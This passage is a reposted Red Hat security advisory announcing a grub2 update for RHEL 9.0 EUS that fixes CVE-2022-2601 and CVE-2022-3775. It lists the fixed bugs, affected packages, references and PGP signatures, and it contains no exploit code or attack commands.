details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1158  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j+CtzjgjWX9erEAQjKdQ/+MVCZUFqW0y8DiZavFLaJUEB16u37RH/Y  
r7CWGtd1er6/M73xJyYQ3UV2+lFZLgTFQuTX7rNE7GowwMtAWCHdlP2CuKKXNeEe  
PjPu2gpA5WBL/8ee9rb9CqnB1MoC3sJ+2g2I5YlB/K/QVrrmqiZc9dsh8pN34JBh  
V/ccIbd8KTjWLS8u/VUtkuRzmfwIBRvFdCDliXoOwn60UwLCebu5G4OfW8Wp8NKF  
2GGl9LuprvYUj1eIZQ+eyBxoPD98QqZNQWDgA9peAQQHQtVNyb7xYT+OzrPRit/1  
O53cG/kzG5O8q87IM5bhj7iPuo3Ryag0u46nq8PJuzePV2nqNskaLCrWTsYgdw1x  
r3htiVNBlh9uviLDaPrAzJxPW6Vhnf6OHV67Dj4aNFL7LKmmz9uKQ+0+XceaHeCg  
Fw62qYX/rgtfQiXX0EjYnrnBpJxnmGAiI3ljTZdyg+RMOf5lUQNn3IHaVOhRb6Wo  
Vuf3tm51hh8AiAJutxHkqWeaDBep+sbprWz35oYlxG05U0iDce+krEwCCurgGTbO  
c+WsJtD33sZE10hX+pNL5SLZqLyTsJCp7n2bU6GNoovPZOBG6jxjd8OSJ1hemqgR  
A0G0Bh25jSES7ZY4N5uGh629Z7DmJB3/Rcbvkj8tc+DRTfTNMPfZsQUmHbQJ7SzI  
I5BfjKeO+1k«KV  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8989-01

Red Hat Security Advisory 2022-8978-01 - The grub2 packages provide version 2 of the Grand Unified Boot Loader, a highly configurable and customizable boot loader with modular architecture. The packages support a variety of kernel formats, file systems, computer architectures, and hardware devices. Issues addressed include buffer overflow, bypass, and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: grub2 security and bug fix update  
Advisory ID:       RHSA-2022:8978-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8978  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-2601 CVE-2022-3775  
====================================================================  
1. Summary:

An update for grub2 is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, noarch, ppc64le, x86_64

3. Description:

The grub2 packages provide version 2 of the Grand Unified Boot Loader  
(GRUB), a highly configurable and customizable boot loader with modular  
architecture. The packages support a variety of kernel formats, file  
systems, computer architectures, and hardware devices.

Security Fix(es):

* grub2: Buffer overflow in grub_font_construct_glyph() can lead to  
out-of-bound write and possible secure boot bypass (CVE-2022-2601)

* grub2: Heap based out-of-bounds write when redering certain unicode  
sequences (CVE-2022-3775)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Kernel Panic on Milan when enable SEV/SEV-ES with CPU: 1 PID: 1 Comm:  
swapper/0 Not tainted (BZ#2130104)

* [RHEL9.0][SecureBoot][Denali/P10] boot process stops at grub prompt after  
copying the signed grub to prep partition (BZ#2134358)

* RHEL9.0 [MAXconfig]: Denali LPAR crashs while booting MAX config 240c /  
64TB - 192 decimal is the biggest partition min value Linux can handle?  
(BZ#2134434)

* ISST-LTE:[P10]:RPT:After FW update,while activating the lpar dexlp87 went  
to ERROR state with LED B2008105 - 7E sub return code (BZ#2135288)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2112975 - CVE-2022-2601 grub2: Buffer overflow in grub_font_construct_glyph() can lead to out-of-bound write and possible secure boot bypass  
2138880 - CVE-2022-3775 grub2: Heap based out-of-bounds write when redering certain unicode sequences

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
grub2-2.06-27.el9_0.12.src.rpm

aarch64:  
grub2-debuginfo-2.06-27.el9_0.12.aarch64.rpm  
grub2-debugsource-2.06-27.el9_0.12.aarch64.rpm  
grub2-efi-aa64-2.06-27.el9_0.12.aarch64.rpm  
grub2-efi-aa64-cdboot-2.06-27.el9_0.12.aarch64.rpm  
grub2-emu-debuginfo-2.06-27.el9_0.12.aarch64.rpm  
grub2-tools-2.06-27.el9_0.12.aarch64.rpm  
grub2-tools-debuginfo-2.06-27.el9_0.12.aarch64.rpm  
grub2-tools-extra-2.06-27.el9_0.12.aarch64.rpm  
grub2-tools-extra-debuginfo-2.06-27.el9_0.12.aarch64.rpm  
grub2-tools-minimal-2.06-27.el9_0.12.aarch64.rpm  
grub2-tools-minimal-debuginfo-2.06-27.el9_0.12.aarch64.rpm

noarch:  
grub2-common-2.06-27.el9_0.12.noarch.rpm  
grub2-efi-aa64-modules-2.06-27.el9_0.12.noarch.rpm  
grub2-efi-x64-modules-2.06-27.el9_0.12.noarch.rpm  
grub2-pc-modules-2.06-27.el9_0.12.noarch.rpm  
grub2-ppc64le-modules-2.06-27.el9_0.12.noarch.rpm

ppc64le:  
grub2-debuginfo-2.06-27.el9_0.12.ppc64le.rpm  
grub2-debugsource-2.06-27.el9_0.12.ppc64le.rpm  
grub2-ppc64le-2.06-27.el9_0.12.ppc64le.rpm  
grub2-tools-2.06-27.el9_0.12.ppc64le.rpm  
grub2-tools-debuginfo-2.06-27.el9_0.12.ppc64le.rpm  
grub2-tools-extra-2.06-27.el9_0.12.ppc64le.rpm  
grub2-tools-extra-debuginfo-2.06-27.el9_0.12.ppc64le.rpm  
grub2-tools-minimal-2.06-27.el9_0.12.ppc64le.rpm  
grub2-tools-minimal-debuginfo-2.06-27.el9_0.12.ppc64le.rpm

x86_64:  
grub2-debuginfo-2.06-27.el9_0.12.x86_64.rpm  
grub2-debugsource-2.06-27.el9_0.12.x86_64.rpm  
grub2-efi-x64-2.06-27.el9_0.12.x86_64.rpm  
grub2-efi-x64-cdboot-2.06-27.el9_0.12.x86_64.rpm  
grub2-emu-debuginfo-2.06-27.el9_0.12.x86_64.rpm  
grub2-pc-2.06-27.el9_0.12.x86_64.rpm  
grub2-tools-2.06-27.el9_0.12.x86_64.rpm  
grub2-tools-debuginfo-2.06-27.el9_0.12.x86_64.rpm  
grub2-tools-efi-2.06-27.el9_0.12.x86_64.rpm  
grub2-tools-efi-debuginfo-2.06-27.el9_0.12.x86_64.rpm  
grub2-tools-extra-2.06-27.el9_0.12.x86_64.rpm  
grub2-tools-extra-debuginfo-2.06-27.el9_0.12.x86_64.rpm  
grub2-tools-minimal-2.06-27.el9_0.12.x86_64.rpm  
grub2-tools-minimal-debuginfo-2.06-27.el9_0.12.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2601  
https://access.redhat.com/security/cve/CVE-2022-3775  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5j9/NzjgjWX9erEAQjbZQ//a/froDILL6ZRBqxuscAjkZrWUPfPWEzw  
m7mLmI0/hIhR5bREv03E0PoLEhRFQrB0eggfcc1lOQGcNCDTazvuUsSaBU1ULUHV  
TVDcoTRPQl/NRnlfGPFvCn9Yz2rWYx9rkeI+rmHD7JBNewYDY1WdA/mmxp9RvV0X  
fxDtwLPfO7PauAe23oCJdmZh1GypZbk3nfS4unkYyu/PLPKiB+MMN/bpAjIqwrML  
xzwc/b/hVmJz3xg5qh+5/2+0P3Oug4hND72JZBYAtbuycCtEHzm29VoNMOOi+P9E  
ApJBiF/V9qyndwFKqi9pyyNtv5naRCcGdYdnUFRaknjF0DKxIsXBs+K1FREtiTDo  
LDXOUuLFe0KYPzY4sD9AMRaikuQWmV5oC0BE7w9bPvuFtXBSttwXkqHJ0D5kt0Da  
PRAXsIfcww0XV91LCui77mrjUPOlIfR0XfxMUrMdde0TJnnTi54DCNM0NJLKmoVV  
83DQqi8Ln1xq+zG78muAgsLCwpB2tL45iyRzD6esZ3VlMbH6sDsOABKNZxJPD+UL  
MCPcvO2ypEBGSH/kppTU/SvKN2ijFPM2ZhV15UX4zI+TcAq1YKoQAdjwAqN39Ksk  
KVRCqno6wJbKREWTijUUM0x7XiLQB+gJ2Z869F6cXxaJ4teY7DprTQQ2xMKbz/lr  
KJfj48QotlU¨i1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm